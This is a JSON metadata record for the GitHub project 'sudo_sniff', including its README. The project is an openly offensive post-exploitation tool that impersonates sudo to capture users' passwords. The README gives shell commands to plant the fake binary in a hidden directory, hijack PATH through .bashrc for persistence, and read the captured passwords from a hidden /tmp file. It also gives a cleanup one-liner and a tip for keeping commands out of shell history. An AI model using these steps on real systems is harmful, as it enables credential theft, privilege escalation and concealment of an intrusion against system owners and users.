{"id":26458485,"url":"https://github.com/mjdubell/sudo_sniff","last_synced_at":"2025-03-19T00:01:53.044Z","repository":{"id":59168730,"uuid":"65943835","full_name":"dubs3c/sudo_sniff","owner":"dubs3c","description":"Steal user's password when running sudo for post-exploitation purposes","archived":false,"fork":false,"pushed_at":"2020-09-29T07:58:25.000Z","size":7,"stargazers_count":38,"open_issues_count":4,"forks_count":12,"subscribers_count":3,"default_branch":"master","last_synced_at":"2024-08-04T09:05:44.792Z","etag":null,"topics":["c","password-sniffer","post-exploitation"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/dubs3c.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2016-08-17T21:39:04.000Z","updated_at":"2024-07-06T16:16:16.000Z","dependencies_parsed_at":"2022-09-12T22:50:10.916Z","dependency_job_id":null,"html_url":"https://github.com/dubs3c/sudo_sniff","commit_stats":null,"previous_names":["mjdubell/sudo_sniff"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dubs3c%2Fsudo_sniff","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dubs3c%2Fsudo_sniff/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dubs3c%2Fsudo_sniff/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dubs3c%2Fsudo_sniff/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/dubs3c","download_url":"https://codeload.github.com/dubs3c/sudo_sniff/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"ht
tps://github.com","kind":"github","repositories_count":244326199,"owners_count":20435122,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["c","password-sniffer","post-exploitation"],"created_at":"2025-03-19T00:01:50.289Z","updated_at":"2025-03-19T00:01:53.033Z","avatar_url":"https://github.com/dubs3c.png","language":"C","funding_links":[],"categories":["\u003ca id=\"7bf0f5839fb2827fdc1b93ae6ac7f53d\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"32739127f0c38d61b14448c66a797098\"\u003e\u003c/a\u003e嗅探\u0026\u0026Sniff"],"readme":"# sudo_sniff\n**sudo\\_sniff** is a simple program that attempts to steal the user's password while running sudo without arousing any suspicion. The idea is to modify the user's `$PATH` in order to hijack sudo when executed by the user. 
This could be used in post-exploitation as an alternative route for achieving root access (given that the user has the correct permissions).\n\n**sudo_sniff** will store both correct and incorrect password entries at the following location by default: `/tmp/.temp5678`\n\n## Improvements\n* ~~Hide the victim's input~~\n* ~~Add function to either send the password to attacker or save it on disk.~~\n* sudo may be in different locations on different systems, perhaps implement a function to locate it\n* ~~[BUG] When the victim enters his input, the text asking for the password will be printed multiple times.~~\n\n## Usage\n```\nhunter@nsa:~$ git clone git@github.com:mjdubell/sudo_sniff.git\nhunter@nsa:~$ cd sudo_sniff/\nhunter@nsa:~$ make\nhunter@nsa:~$ ./sudo whoami\n```\n\n#### Post Exploitation\n```\nvictim@server:~$ mkdir $HOME/.payload\nvictim@server:~$ gcc -Wall -g -o $HOME/.payload/sudo sudo_sniff.c\nvictim@server:~$ echo 'export PATH=\"$HOME/.payload:$PATH\"' \u003e\u003e $HOME/.bashrc\n```\n*Note: Make sure `sudo` is executable.*\n\n##### Cleanup\n```\nvictim@server:~$ rm -rf $HOME/.payload; rm /tmp/.temp5678; sed '/export PATH=\"$HOME\\/\\.payload:$PATH\"/d' .bashrc \u003e tmp \u0026\u0026 mv tmp .bashrc\n```\n*Note: If the HISTCONTROL environment variable is set to \"ignorespace\" or \"ignoreboth\", adding a space before the command will prevent it from showing up when running `history`.*\n\n##### Retrieve the password\n```\nvictim@server:~$ cat /tmp/.temp5678\nvictim:mypasword:ERROR\nvictim:mypassword:SUCCESS\n```\n\n## Contributing\n1. Fork it!\n2. Create your feature branch: `git checkout -b my-new-feature`\n3. Commit your changes: `git commit -am 'Add some feature'`\n4. Push to the branch: `git push origin my-new-feature`\n5. 
Submit a pull request :D\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmjdubell%2Fsudo_sniff","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmjdubell%2Fsudo_sniff","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmjdubell%2Fsudo_sniff/lists"}